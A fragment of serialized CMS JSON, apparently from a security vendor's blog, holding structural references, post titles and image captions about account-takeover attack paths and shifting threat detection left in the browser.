"content":194321},{},[194322],{"nodeType":173,"value":184568,"marks":194323,"data":194324},[],{},{"nodeType":254,"data":194326,"content":194327},{},[194328],{"nodeType":178,"data":194329,"content":194330},{},[194331],{"nodeType":173,"value":184578,"marks":194332,"data":194333},[],{},{"nodeType":254,"data":194335,"content":194336},{},[194337],{"nodeType":178,"data":194338,"content":194339},{},[194340],{"nodeType":173,"value":184588,"marks":194341,"data":194342},[],{},{"nodeType":254,"data":194344,"content":194345},{},[194346],{"nodeType":178,"data":194347,"content":194348},{},[194349],{"nodeType":173,"value":184598,"marks":194350,"data":194351},[],{},{"nodeType":178,"data":194353,"content":194354},{},[194355,194358,194365],{"nodeType":173,"value":184605,"marks":194356,"data":194357},[],{},{"nodeType":186,"data":194359,"content":194360},{"uri":81621},[194361],{"nodeType":173,"value":184612,"marks":194362,"data":194364},[194363],{"type":194},{},{"nodeType":173,"value":184617,"marks":194366,"data":194367},[],{},{"entries":194369},{"hyperlink":194370,"inline":194371,"block":194372},[],[],[194373,194378],{"sys":194374,"__typename":5345,"title":194375,"caption":194376,"layoutMode":118,"file":194377},{"id":184239},"ServiceNow attack path","Path to account takeover and data exfiltration in ServiceNow",{"url":192213,"width":179211,"height":46382},{"sys":194379,"__typename":5345,"title":179207,"caption":179208,"layoutMode":118,"file":194380},{"id":4290},{"url":179210,"width":179211,"height":46382},"content:blog:learning-from-the-servicenow-disclosure.json","blog/learning-from-the-servicenow-disclosure.json","blog/learning-from-the-servicenow-disclosure",{"_path":194385,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":194386,"summary":194388,"title":171516,"subtitle":118,"metaTitle":171516,"synopsis":171517,"hashTags":118,"publishedDate":171518,"slug":171519,"ogImage":194399,"tagsCollection":194401,"authorsCollection":194407,"content":194411,"relatedBlogPostsCollection":195177,"_id":198032,"_type":5439,"_source":5440,"_file":198033,"_stem":198034,"_extension":5439},"/blog/shifting-detection-left-for-more-effective-threat-detection",{"id":170700,"publishedAt":194387},"2026-01-30T12:00:41.186Z",{"json":194389},{"data":194390,"content":194391,"nodeType":165},{},[194392],{"data":194393,"content":194394,"nodeType":178},{},[194395],{"data":194396,"marks":194397,"value":194398,"nodeType":173},{},[],"This is the second blog in our series looking at the ‘why’ behind the ‘what’ at Push. In this entry, we’re exploring the idea of shifting detection and response left in the face of modern attacks. ",{"url":194400},"https://images.ctfassets.net/y1cdw1ablpvd/32uMppErtDqKKUWVxBF0xG/5dc1ab2271688efacead5b0aaf2cab8e/Legacy_and_modern_attack_paths.png",{"items":194402},[194403,194405],{"sys":194404,"name":509},{"id":508},{"sys":194406,"name":505},{"id":504},{"items":194408},[194409],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":194410},{"url":1496},{"json":194412,"links":195129},{"nodeType":165,"data":194413,"content":194414},{},[194415,194421,194427,194433,194438,194445,194451,194456,194462,194467,194473,194480,194486,194491,194497,194523,194529,194535,194565,194572,194578,194585,194592,194598,194604,194620,194626,194632,194638,194645,194651,194657,194687,194693,194741,194747,194753,194760,194766,194772,194778,194785,194791,194812,194818,194860,194866,194871,194877,194916,194922,194929,194935,194941,194967,194974,194980,194985,194991,194996,195002,195007,195013,195088,195094,195101,195107,195123],{"nodeType":178,"data":194416,"content":194417},{},[194418],{"nodeType":173,"value":170709,"marks":194419,"data":194420},[],{},{"nodeType":178,"data":194422,"content":194423},{},[194424],{"nodeType":173,"value":170716,"marks":194425,"data":194426},[],{},{"nodeType":178,"data":194428,"content":194429},{},[194430],{"nodeType":173,"value":170723,"marks":194431,"data":194432},[],{},{"nodeType":312,"data":194434,"content":194437},{"target":194435},{"sys":194436},{"id":170730,"type":317,"linkType":318},[],{"nodeType":169,"data":194439,"content":194440},{},[194441],{"nodeType":173,"value":161803,"marks":194442,"data":194444},[194443],{"type":370},{},{"nodeType":178,"data":194446,"content":194447},{},[194448],{"nodeType":173,"value":170743,"marks":194449,"data":194450},[],{},{"nodeType":312,"data":194452,"content":194455},{"target":194453},{"sys":194454},{"id":170750,"type":317,"linkType":318},[],{"nodeType":178,"data":194457,"content":194458},{},[194459],{"nodeType":173,"value":170756,"marks":194460,"data":194461},[],{},{"nodeType":312,"data":194463,"content":194466},{"target":194464},{"sys":194465},{"id":170763,"type":317,"linkType":318},[],{"nodeType":178,"data":194468,"content":194469},{},[194470],{"nodeType":173,"value":170769,"marks":194471,"data":194472},[],{},{"nodeType":169,"data":194474,"content":194475},{},[194476],{"nodeType":173,"value":170776,"marks":194477,"data":194479},[194478],{"type":370},{},{"nodeType":178,"data":194481,"content":194482},{},[194483],{"nodeType":173,"value":170784,"marks":194484,"data":194485},[],{},{"nodeType":312,"data":194487,"content":194490},{"target":194488},{"sys":194489},{"id":111813,"type":317,"linkType":318},[],{"nodeType":178,"data":194492,"content":194493},{},[194494],{"nodeType":173,"value":170796,"marks":194495,"data":194496},[],{},{"nodeType":178,"data":194498,"content":194499},{},[194500,194503,194510,194513,194520],{"nodeType":173,"value":170803,"marks":194501,"data":194502},[],{},{"nodeType":186,"data":194504,"content":194505},{"uri":88239},[194506],{"nodeType":173,"value":170810,"marks":194507,"data":194509},[194508],{"type":194},{},{"nodeType":173,"value":170815,"marks":194511,"data":194512},[],{},{"nodeType":186,"data":194514,"content":194515},{"uri":170820},[194516],{"nodeType":173,"value":170823,"marks":194517,"data":194519},[194518],{"type":194},{},{"nodeType":173,"value":60235,"marks":194521,"data":194522},[],{},{"nodeType":178,"data":194524,"content":194525},{},[194526],{"nodeType":173,"value":170834,"marks":194527,"data":194528},[],{},{"nodeType":178,"data":194530,"content":194531},{},[194532],{"nodeType":173,"value":170841,"marks":194533,"data":194534},[],{},{"nodeType":250,"data":194536,"content":194537},{},[194538,194547,194556],{"nodeType":254,"data":194539,"content":194540},{},[194541],{"nodeType":178,"data":194542,"content":194543},{},[194544],{"nodeType":173,"value":170854,"marks":194545,"data":194546},[],{},{"nodeType":254,"data":194548,"content":194549},{},[194550],{"nodeType":178,"data":194551,"content":194552},{},[194553],{"nodeType":173,"value":170864,"marks":194554,"data":194555},[],{},{"nodeType":254,"data":194557,"content":194558},{},[194559],{"nodeType":178,"data":194560,"content":194561},{},[194562],{"nodeType":173,"value":170874,"marks":194563,"data":194564},[],{},{"nodeType":178,"data":194566,"content":194567},{},[194568],{"nodeType":173,"value":170881,"marks":194569,"data":194571},[194570],{"type":370},{},{"nodeType":178,"data":194573,"content":194574},{},[194575],{"nodeType":173,"value":170889,"marks":194576,"data":194577},[],{},{"nodeType":169,"data":194579,"content":194580},{},[194581],{"nodeType":173,"value":170896,"marks":194582,"data":194584},[194583],{"type":370},{},{"nodeType":235,"data":194586,"content":194587},{},[194588],{"nodeType":173,"value":170904,"marks":194589,"data":194591},[194590],{"type":370},{},{"nodeType":178,"data":194593,"content":194594},{},[194595],{"nodeType":173,"value":170912,"marks":194596,"data":194597},[],{},{"nodeType":178,"data":194599,"content":194600},{},[194601],{"nodeType":173,"value":170919,"marks":194602,"data":194603},[],{},{"nodeType":178,"data":194605,"content":194606},{},[194607,194610,194617],{"nodeType":173,"value":170926,"marks":194608,"data":194609},[],{},{"nodeType":186,"data":194611,"content":194612},{"uri":75099},[194613],{"nodeType":173,"value":170933,"marks":194614,"data":194616},[194615],{"type":194},{},{"nodeType":173,"value":170938,"marks":194618,"data":194619},[],{},{"nodeType":178,"data":194621,"content":194622},{},[194623],{"nodeType":173,"value":170945,"marks":194624,"data":194625},[],{},{"nodeType":178,"data":194627,"content":194628},{},[194629],{"nodeType":173,"value":170952,"marks":194630,"data":194631},[],{},{"nodeType":178,"data":194633,"content":194634},{},[194635],{"nodeType":173,"value":170959,"marks":194636,"data":194637},[],{},{"nodeType":235,"data":194639,"content":194640},{},[194641],{"nodeType":173,"value":170966,"marks":194642,"data":194644},[194643],{"type":370},{},{"nodeType":178,"data":194646,"content":194647},{},[194648],{"nodeType":173,"value":170974,"marks":194649,"data":194650},[],{},{"nodeType":178,"data":194652,"content":194653},{},[194654],{"nodeType":173,"value":170981,"marks":194655,"data":194656},[],{},{"nodeType":250,"data":194658,"content":194659},{},[194660,194669,194678],{"nodeType":254,"data":194661,"content":194662},{},[194663],{"nodeType":178,"data":194664,"content":194665},{},[194666],{"nodeType":173,"value":170994,"marks":194667,"data":194668},[],{},{"nodeType":254,"data":194670,"content":194671},{},[194672],{"nodeType":178,"data":194673,"content":194674},{},[194675],{"nodeType":173,"value":171004,"marks":194676,"data":194677},[],{},{"nodeType":254,"data":194679,"content":194680},{},[194681],{"nodeType":178,"data":194682,"content":194683},{},[194684],{"nodeType":173,"value":171014,"marks":194685,"data":194686},[],{},{"nodeType":178,"data":194688,"content":194689},{},[194690],{"nodeType":173,"value":171021,"marks":194691,"data":194692},[],{},{"nodeType":250,"data":194694,"content":194695},{},[194696,194705,194714,194723,194732],{"nodeType":254,"data":194697,"content":194698},{},[194699],{"nodeType":178,"data":194700,"content":194701},{},[194702],{"nodeType":173,"value":171034,"marks":194703,"data":194704},[],{},{"nodeType":254,"data":194706,"content":194707},{},[194708],{"nodeType":178,"data":194709,"content":194710},{},[194711],{"nodeType":173,"value":171044,"marks":194712,"data":194713},[],{},{"nodeType":254,"data":194715,"content":194716},{},[194717],{"nodeType":178,"data":194718,"content":194719},{},[194720],{"nodeType":173,"value":171054,"marks":194721,"data":194722},[],{},{"nodeType":254,"data":194724,"content":194725},{},[194726],{"nodeType":178,"data":194727,"content":194728},{},[194729],{"nodeType":173,"value":171064,"marks":194730,"data":194731},[],{},{"nodeType":254,"data":194733,"content":194734},{},[194735],{"nodeType":178,"data":194736,"content":194737},{},[194738],{"nodeType":173,"value":171074,"marks":194739,"data":194740},[],{},{"nodeType":178,"data":194742,"content":194743},{},[194744],{"nodeType":173,"value":171081,"marks":194745,"data":194746},[],{},{"nodeType":178,"data":194748,"content":194749},{},[194750],{"nodeType":173,"value":171088,"marks":194751,"data":194752},[],{},{"nodeType":169,"data":194754,"content":194755},{},[194756],{"nodeType":173,"value":171095,"marks":194757,"data":194759},[194758],{"type":370},{},{"nodeType":178,"data":194761,"content":194762},{},[194763],{"nodeType":173,"value":171103,"marks":194764,"data":194765},[],{},{"nodeType":178,"data":194767,"content":194768},{},[194769],{"nodeType":173,"value":171110,"marks":194770,"data":194771},[],{},{"nodeType":178,"data":194773,"content":194774},{},[194775],{"nodeType":173,"value":171117,"marks":194776,"data":194777},[],{},{"nodeType":235,"data":194779,"content":194780},{},[194781],{"nodeType":173,"value":171124,"marks":194782,"data":194784},[194783],{"type":370},{},{"nodeType":178,"data":194786,"content":194787},{},[194788],{"nodeType":173,"value":171132,"marks":194789,"data":194790},[],{},{"nodeType":250,"data":194792,"content":194793},{},[194794,194803],{"nodeType":254,"data":194795,"content":194796},{},[194797],{"nodeType":178,"data":194798,"content":194799},{},[194800],{"nodeType":173,"value":171145,"marks":194801,"data":194802},[],{},{"nodeType":254,"data":194804,"content":194805},{},[194806],{"nodeType":178,"data":194807,"content":194808},{},[194809],{"nodeType":173,"value":171155,"marks":194810,"data":194811},[],{},{"nodeType":178,"data":194813,"content":194814},{},[194815],{"nodeType":173,"value":171162,"marks":194816,"data":194817},[],{},{"nodeType":250,"data":194819,"content":194820},{},[194821,194834,194847],{"nodeType":254,"data":194822,"content":194823},{},[194824],{"nodeType":178,"data":194825,"content":194826},{},[194827,194831],{"nodeType":173,"value":171175,"marks":194828,"data":194830},[194829],{"type":370},{},{"nodeType":173,"value":171180,"marks":194832,"data":194833},[],{},{"nodeType":254,"data":194835,"content":194836},{},[194837],{"nodeType":178,"data":194838,"content":194839},{},[194840,194844],{"nodeType":173,"value":171190,"marks":194841,"data":194843},[194842],{"type":370},{},{"nodeType":173,"value":171195,"marks":194845,"data":194846},[],{},{"nodeType":254,"data":194848,"content":194849},{},[194850],{"nodeType":178,"data":194851,"content":194852},{},[194853,194857],{"nodeType":173,"value":171205,"marks":194854,"data":194856},[194855],{"type":370},{},{"nodeType":173,"value":171210,"marks":194858,"data":194859},[],{},{"nodeType":178,"data":194861,"content":194862},{},[194863],{"nodeType":173,"value":171217,"marks":194864,"data":194865},[],{},{"nodeType":312,"data":194867,"content":194870},{"target":194868},{"sys":194869},{"id":171224,"type":317,"linkType":318},[],{"nodeType":178,"data":194872,"content":194873},{},[194874],{"nodeType":173,"value":171230,"marks":194875,"data":194876},[],{},{"nodeType":250,"data":194878,"content":194879},{},[194880,194889,194898,194907],{"nodeType":254,"data":194881,"content":194882},{},[194883],{"nodeType":178,"data":194884,"content":194885},{},[194886],{"nodeType":173,"value":171243,"marks":194887,"data":194888},[],{},{"nodeType":254,"data":194890,"content":194891},{},[194892],{"nodeType":178,"data":194893,"content":194894},{},[194895],{"nodeType":173,"value":171253,"marks":194896,"data":194897},[],{},{"nodeType":254,"data":194899,"content":194900},{},[194901],{"nodeType":178,"data":194902,"content":194903},{},[194904],{"nodeType":173,"value":171263,"marks":194905,"data":194906},[],{},{"nodeType":254,"data":194908,"content":194909},{},[194910],{"nodeType":178,"data":194911,"content":194912},{},[194913],{"nodeType":173,"value":171273,"marks":194914,"data":194915},[],{},{"nodeType":178,"data":194917,"content":194918},{},[194919],{"nodeType":173,"value":171280,"marks":194920,"data":194921},[],{},{"nodeType":235,"data":194923,"content":194924},{},[194925],{"nodeType":173,"value":171287,"marks":194926,"data":194928},[194927],{"type":370},{},{"nodeType":178,"data":194930,"content":194931},{},[194932],{"nodeType":173,"value":171295,"marks":194933,"data":194934},[],{},{"nodeType":178,"data":194936,"content":194937},{},[194938],{"nodeType":173,"value":171302,"marks":194939,"data":194940},[],{},{"nodeType":178,"data":194942,"content":194943},{},[194944,194947,194954,194957,194964],{"nodeType":173,"value":171309,"marks":194945,"data":194946},[],{},{"nodeType":186,"data":194948,"content":194949},{"uri":188},[194950],{"nodeType":173,"value":171316,"marks":194951,"data":194953},[194952],{"type":194},{},{"nodeType":173,"value":171321,"marks":194955,"data":194956},[],{},{"nodeType":186,"data":194958,"content":194959},{"uri":74693},[194960],{"nodeType":173,"value":171328,"marks":194961,"data":194963},[194962],{"type":194},{},{"nodeType":173,"value":171333,"marks":194965,"data":194966},[],{},{"nodeType":235,"data":194968,"content":194969},{},[194970],{"nodeType":173,"value":171340,"marks":194971,"data":194973},[194972],{"type":370},{},{"nodeType":178,"data":194975,"content":194976},{},[194977],{"nodeType":173,"value":171348,"marks":194978,"data":194979},[],{},{"nodeType":312,"data":194981,"content":194984},{"target":194982},{"sys":194983},{"id":171355,"type":317,"linkType":318},[],{"nodeType":178,"data":194986,"content":194987},{},[194988],{"nodeType":173,"value":171361,"marks":194989,"data":194990},[],{},{"nodeType":312,"data":194992,"content":194995},{"target":194993},{"sys":194994},{"id":171368,"type":317,"linkType":318},[],{"nodeType":178,"data":194997,"content":194998},{},[194999],{"nodeType":173,"value":171374,"marks":195000,"data":195001},[],{},{"nodeType":312,"data":195003,"content":195006},{"target":195004},{"sys":195005},{"id":171381,"type":317,"linkType":318},[],{"nodeType":178,"data":195008,"content":195009},{},[195010],{"nodeType":173,"value":171387,"marks":195011,"data":195012},[],{},{"nodeType":250,"data":195014,"content":195015},{},[195016,195034,195052,195070],{"nodeType":254,"data":195017,"content":195018},{},[195019],{"nodeType":178,"data":195020,"content":195021},{},[195022,195025,195031],{"nodeType":173,"value":171400,"marks":195023,"data":195024},[],{},{"nodeType":186,"data":195026,"content":195027},{"uri":75027},[195028],{"nodeType":173,"value":75030,"marks":195029,"data":195030},[],{},{"nodeType":173,"value":37,"marks":195032,"data":195033},[],{},{"nodeType":254,"data":195035,"content":195036},{},[195037],{"nodeType":178,"data":195038,"content":195039},{},[195040,195043,195049],{"nodeType":173,"value":171419,"marks":195041,"data":195042},[],{},{"nodeType":186,"data":195044,"content":195045},{"uri":75048},[195046],{"nodeType":173,"value":75051,"marks":195047,"data":195048},[],{},{"nodeType":173,"value":197,"marks":195050,"data":195051},[],{},{"nodeType":254,"data":195053,"content":195054},{},[195055],{"nodeType":178,"data":195056,"content":195057},{},[195058,195061,195067],{"nodeType":173,"value":171438,"marks":195059,"data":195060},[],{},{"nodeType":186,"data":195062,"content":195063},{"uri":9099},[195064],{"nodeType":173,"value":75009,"marks":195065,"data":195066},[],{},{"nodeType":173,"value":197,"marks":195068,"data":195069},[],{},{"nodeType":254,"data":195071,"content":195072},{},[195073],{"nodeType":178,"data":195074,"content":195075},{},[195076,195079,195085],{"nodeType":173,"value":171457,"marks":195077,"data":195078},[],{},{"nodeType":186,"data":195080,"content":195081},{"uri":4751},[195082],{"nodeType":173,"value":171464,"marks":195083,"data":195084},[],{},{"nodeType":173,"value":37,"marks":195086,"data":195087},[],{},{"nodeType":178,"data":195089,"content":195090},{},[195091],{"nodeType":173,"value":171474,"marks":195092,"data":195093},[],{},{"nodeType":169,"data":195095,"content":195096},{},[195097],{"nodeType":173,"value":40632,"marks":195098,"data":195100},[195099],{"type":370},{},{"nodeType":178,"data":195102,"content":195103},{},[195104],{"nodeType":173,"value":171488,"marks":195105,"data":195106},[],{},{"nodeType":178,"data":195108,"content":195109},{},[195110,195113,195120],{"nodeType":173,"value":171495,"marks":195111,"data":195112},[],{},{"nodeType":186,"data":195114,"content":195115},{"uri":188},[195116],{"nodeType":173,"value":171502,"marks":195117,"data":195119},[195118],{"type":194},{},{"nodeType":173,"value":197,"marks":195121,"data":195122},[],{},{"nodeType":178,"data":195124,"content":195125},{},[195126],{"nodeType":173,"value":171513,"marks":195127,"data":195128},[],{},{"entries":195130},{"hyperlink":195131,"inline":195132,"block":195133},[],[],[195134,195137,195143,195149,195152,195158,195165,195171],{"sys":195135,"__typename":15269,"type":15270,"ctaText":195136,"buttonLabel":134264,"buttonColour":15273,"buttonUrl":188},{"id":170730},"New to the series? Read our first design principles blog on building better detections using the Pyramid of Pain",{"sys":195138,"__typename":5345,"title":195139,"caption":195139,"layoutMode":118,"file":195140},{"id":170750},"Network compromise in a traditional 'on-prem' environment",{"url":195141,"width":75589,"height":195142},"https://images.ctfassets.net/y1cdw1ablpvd/2kWUeTHvxsqJDvXP0v2Mev/57cc372e313a1d36e9c53e4c099831b1/Traditional_attack_path.png",597,{"sys":195144,"__typename":5345,"title":195145,"caption":195145,"layoutMode":118,"file":195146},{"id":170763},"The typical attack path (according to old-school consultancies and MSSPs)",{"url":195147,"width":132212,"height":195148},"https://images.ctfassets.net/y1cdw1ablpvd/2lqJtgZROb1Qyoa0myb692/37dedf4120ba60cfb340fd3a69bea248/Typical_hybrid_attack_path.png",893,{"sys":195150,"__typename":5345,"title":137040,"caption":137040,"layoutMode":118,"file":195151},{"id":111813},{"url":75588,"width":75589,"height":75590},{"sys":195153,"__typename":5345,"title":195154,"caption":195155,"layoutMode":118,"file":195156},{"id":171224},"Paths to account takeover","Overlapping paths to account takeover via phishing, infostealers and credential stuffing",{"url":195157,"width":132212,"height":195148},"https://images.ctfassets.net/y1cdw1ablpvd/3UZL6NydNnGa0kJHF9s6Ld/2fdb6d3aa8abb45d89cf334f5d3e9139/Paths_to_account_takeover__1_.png",{"sys":195159,"__typename":5345,"title":195160,"caption":195161,"layoutMode":118,"file":195162},{"id":171355},"Browser visibility and telemetry","The browser provides deep, real time visibility of the rendered web app and user activity",{"url":195163,"width":60004,"height":195164},"https://images.ctfassets.net/y1cdw1ablpvd/7ntzZN0bNnt4Rc3kseTfji/d303986b42f9bab60a6566c5694d26b7/image2.png",738,{"sys":195166,"__typename":5345,"title":195167,"caption":195168,"layoutMode":118,"file":195169},{"id":171368},"Identity attack detection without Push","TI-driven blocklists and email scanning tools are routinely bypassed by attackers",{"url":195170,"width":132212,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/1pyLJUgcNuPV2hHz8BgXt6/6e587945d0985e9025e9e628efc2e227/Phishing_detection_without_Push__6_.png",{"sys":195172,"__typename":5345,"title":195173,"caption":195174,"layoutMode":118,"file":195175},{"id":171381},"Identity attack detection with Push","Push detects and blocks multiple stages of an account takeover attempt",{"url":195176,"width":132212,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/3DfcvJLYux6dAVkf6w0izK/0b2ecf039f7f8c749c05a4cde306f4b6/Session_hijacking_detection_with_Push__1_.png",{"items":195178},[195179,195746,196973],{"__typename":1528,"sys":195180,"content":195181,"title":75144,"synopsis":75145,"hashTags":118,"publishedDate":75146,"slug":75147,"tagsCollection":195736,"authorsCollection":195742},{"id":74493},{"json":195182},{"nodeType":165,"data":195183,"content":195184},{},[195185,195191,195197,195217,195222,195228,195234,195237,195243,195259,195264,195270,195303,195309,195315,195321,195327,195333,195339,195354,195361,195364,195370,195376,195382,195388,195394,195400,195406,195448,195454,195460,195466,195482,195488,195494,195500,195506,195512,195518,195524,195539,195554,195593,195599,195605,195662,195668,195671,195677,195690,195705,195711,195716,195721,195724,195730],{"nodeType":178,"data":195186,"content":195187},{},[195188],{"nodeType":173,"value":74502,"marks":195189,"data":195190},[],{},{"nodeType":178,"data":195192,"content":195193},{},[195194],{"nodeType":173,"value":74509,"marks":195195,"data":195196},[],{},{"nodeType":178,"data":195198,"content":195199},{},[195200,195203,195210,195213],{"nodeType":173,"value":74516,"marks":195201,"data":195202},[],{},{"nodeType":186,"data":195204,"content":195205},{"uri":74521},[195206],{"nodeType":173,"value":74524,"marks":195207,"data":195209},[195208],{"type":194},{},{"nodeType":173,"value":74529,"marks":195211,"data":195212},[],{},{"nodeType":173,"value":74533,"marks":195214,"data":195216},[195215],{"type":370},{},{"nodeType":312,"data":195218,"content":195221},{"target":195219},{"sys":195220},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":195223,"content":195224},{},[195225],{"nodeType":173,"value":74547,"marks":195226,"data":195227},[],{},{"nodeType":178,"data":195229,"content":195230},{},[195231],{"nodeType":173,"value":74554,"marks":195232,"data":195233},[],{},{"nodeType":231,"data":195235,"content":195236},{},[],{"nodeType":169,"data":195238,"content":195239},{},[195240],{"nodeType":173,"value":74564,"marks":195241,"data":195242},[],{},{"nodeType":178,"data":195244,"content":195245},{},[195246,195249,195256],{"nodeType":173,"value":74571,"marks":195247,"data":195248},[],{},{"nodeType":186,"data":195250,"content":195251},{"uri":74576},[195252],{"nodeType":173,"value":74579,"marks":195253,"data":195255},[195254],{"type":194},{},{"nodeType":173,"value":74584,"marks":195257,"data":195258},[],{},{"nodeType":312,"data":195260,"content":195263},{"target":195261},{"sys":195262},{"id":74591,"type":317,"linkType":318},[],{"nodeType":178,"data":195265,"content":195266},{},[195267],{"nodeType":173,"value":74597,"marks":195268,"data":195269},[],{},{"nodeType":178,"data":195271,"content":195272},{},[195273,195276,195282,195285,195291,195294,195300],{"nodeType":173,"value":74604,"marks":195274,"data":195275},[],{},{"nodeType":186,"data":195277,"content":195278},{"uri":74609},[195279],{"nodeType":173,"value":74612,"marks":195280,"data":195281},[],{},{"nodeType":173,"value":74616,"marks":195283,"data":195284},[],{},{"nodeType":186,"data":195286,"content":195287},{"uri":74621},[195288],{"nodeType":173,"value":74624,"marks":195289,"data":195290},[],{},{"nodeType":173,"value":74628,"marks":195292,"data":195293},[],{},{"nodeType":186,"data":195295,"content":195296},{"uri":3999},[195297],{"nodeType":173,"value":74635,"marks":195298,"data":195299},[],{},{"nodeType":173,"value":74639,"marks":195301,"data":195302},[],{},{"nodeType":178,"data":195304,"content":195305},{},[195306],{"nodeType":173,"value":74646,"marks":195307,"data":195308},[],{},{"nodeType":235,"data":195310,"content":195311},{},[195312],{"nodeType":173,"value":74653,"marks":195313,"data":195314},[],{},{"nodeType":178,"data":195316,"content":195317},{},[195318],{"nodeType":173,"value":74660,"marks":195319,"data":195320},[],{},{"nodeType":178,"data":195322,"content":195323},{},[195324],{"nodeType":173,"value":74667,"marks":195325,"data":195326},[],{},{"nodeType":178,"data":195328,"content":195329},{},[195330],{"nodeType":173,"value":74674,"marks":195331,"data":195332},[],{},{"nodeType":178,"data":195334,"content":195335},{},[195336],{"nodeType":173,"value":74681,"marks":195337,"data":195338},[],{},{"nodeType":178,"data":195340,"content":195341},{},[195342,195345,195351],{"nodeType":173,"value":74688,"marks":195343,"data":195344},[],{},{"nodeType":186,"data":195346,"content":195347},{"uri":74693},[195348],{"nodeType":173,"value":74696,"marks":195349,"data":195350},[],{},{"nodeType":173,"value":74700,"marks":195352,"data":195353},[],{},{"nodeType":178,"data":195355,"content":195356},{},[195357],{"nodeType":173,"value":74707,"marks":195358,"data":195360},[195359],{"type":370},{},{"nodeType":231,"data":195362,"content":195363},{},[],{"nodeType":169,"data":195365,"content":195366},{},[195367],{"nodeType":173,"value":74718,"marks":195368,"data":195369},[],{},{"nodeType":178,"data":195371,"content":195372},{},[195373],{"nodeType":173,"value":74725,"marks":195374,"data":195375},[],{},{"nodeType":178,"data":195377,"content":195378},{},[195379],{"nodeType":173,"value":74732,"marks":195380,"data":195381},[],{},{"nodeType":178,"data":195383,"content":195384},{},[195385],{"nodeType":173,"value":74739,"marks":195386,"data":195387},[],{},{"nodeType":178,"data":195389,"content":195390},{},[195391],{"nodeType":173,"value":74746,"marks":195392,"data":195393},[],{},{"nodeType":235,"data":195395,"content":195396},{},[195397],{"nodeType":173,"value":74753,"marks":195398,"data":195399},[],{},{"nodeType":178,"data":195401,"content":195402},{},[195403],{"nodeType":173,"value":74760,"marks":195404,"data":195405},[],{},{"nodeType":250,"data":195407,"content":195408},{},[195409,195422,195435],{"nodeType":254,"data":195410,"content":195411},{},[195412],{"nodeType":178,"data":195413,"content":195414},{},[195415,195419],{"nodeType":173,"value":74773,"marks":195416,"data":195418},[195417],{"type":370},{},{"nodeType":173,"value":74778,"marks":195420,"data":195421},[],{},{"nodeType":254,"data":195423,"content":195424},{},[195425],{"nodeType":178,"data":195426,"content":195427},{},[195428,195432],{"nodeType":173,"value":74788,"marks":195429,"data":195431},[195430],{"type":370},{},{"nodeType":173,"value":74793,"marks":195433,"data":195434},[],{},{"nodeType":254,"data":195436,"content":195437},{},[195438],{"nodeType":178,"data":195439,"content":195440},{},[195441,195445],{"nodeType":173,"value":74803,"marks":195442,"data":195444},[195443],{"type":370},{},{"nodeType":173,"value":74808,"marks":195446,"data":195447},[],{},{"nodeType":178,"data":195449,"content":195450},{},[195451],{"nodeType":173,"value":74815,"marks":195452,"data":195453},[],{},{"nodeType":235,"data":195455,"content":195456},{},[195457],{"nodeType":173,"value":74822,"marks":195458,"data":195459},[],{},{"nodeType":178,"data":195461,"content":195462},{},[195463],{"nodeType":173,"value":74829,"marks":195464,"data":195465},[],{},{"nodeType":178,"data":195467,"content":195468},{},[195469,195472,195479],{"nodeType":173,"value":74836,"marks":195470,"data":195471},[],{},{"nodeType":186,"data":195473,"content":195474},{"uri":74841},[195475],{"nodeType":173,"value":74844,"marks":195476,"data":195478},[195477],{"type":194},{},{"nodeType":173,"value":74849,"marks":195480,"data":195481},[],{},{"nodeType":178,"data":195483,"content":195484},{},[195485],{"nodeType":173,"value":74856,"marks":195486,"data":195487},[],{},{"nodeType":235,"data":195489,"content":195490},{},[195491],{"nodeType":173,"value":74863,"marks":195492,"data":195493},[],{},{"nodeType":178,"data":195495,"content":195496},{},[195497],{"nodeType":173,"value":74870,"marks":195498,"data":195499},[],{},{"nodeType":178,"data":195501,"content":195502},{},[195503],{"nodeType":173,"value":74877,"marks":195504,"data":195505},[],{},{"nodeType":178,"data":195507,"content":195508},{},[195509],{"nodeType":173,"value":74884,"marks":195510,"data":195511},[],{},{"nodeType":235,"data":195513,"content":195514},{},[195515],{"nodeType":173,"value":74891,"marks":195516,"data":195517},[],{},{"nodeType":178,"data":195519,"content":195520},{},[195521],{"nodeType":173,"value":74898,"marks":195522,"data":195523},[],{},{"nodeType":178,"data":195525,"content":195526},{},[195527,195530,195536],{"nodeType":173,"value":74905,"marks":195528,"data":195529},[],{},{"nodeType":186,"data":195531,"content":195532},{"uri":9099},[195533],{"nodeType":173,"value":74912,"marks":195534,"data":195535},[],{},{"nodeType":173,"value":1477,"marks":195537,"data":195538},[],{},{"nodeType":178,"data":195540,"content":195541},{},[195542,195545,195551],{"nodeType":173,"value":74922,"marks":195543,"data":195544},[],{},{"nodeType":186,"data":195546,"content":195547},{"uri":74693},[195548],{"nodeType":173,"value":74929,"marks":195549,"data":195550},[],{},{"nodeType":173,"value":39946,"marks":195552,"data":195553},[],{},{"nodeType":250,"data":195555,"content":195556},{},[195557,195566,195575,195584],{"nodeType":254,"data":195558,"content":195559},{},[195560],{"nodeType":178,"data":195561,"content":195562},{},[195563],{"nodeType":173,"value":74945,"marks":195564,"data":195565},[],{},{"nodeType":254,"data":195567,"content":195568},{},[195569],{"nodeType":178,"data":195570,"content":195571},{},[195572],{"nodeType":173,"value":74955,"marks":195573,"data":195574},[],{},{"nodeType":254,"data":195576,"content":195577},{},[195578],{"nodeType":178,"data":195579,"content":195580},{},[195581],{"nodeType":173,"value":74965,"marks":195582,"data":195583},[],{},{"nodeType":254,"data":195585,"content":195586},{},[195587],{"nodeType":178,"data":195588,"content":195589},{},[195590],{"nodeType":173,"value":74975,"marks":195591,"data":195592},[],{},{"nodeType":178,"data":195594,"content":195595},{},[195596],{"nodeType":173,"value":74982,"marks":195597,"data":195598},[],{},{"nodeType":178,"data":195600,"content":195601},{},[195602],{"nodeType":173,"value":74989,"marks":195603,"data":195604},[],{},{"nodeType":250,"data":195606,"content":195607},{},[195608,195626,195644],{"nodeType":254,"data":195609,"content":195610},{},[195611],{"nodeType":178,"data":195612,"content":195613},{},[195614,195617,195623],{"nodeType":173,"value":75002,"marks":195615,"data":195616},[],{},{"nodeType":186,"data":195618,"content":195619},{"uri":9099},[195620],{"nodeType":173,"value":75009,"marks":195621,"data":195622},[],{},{"nodeType":173,"value":197,"marks":195624,"data":195625},[],{},{"nodeType":254,"data":195627,"content":195628},{},[195629],{"nodeType":178,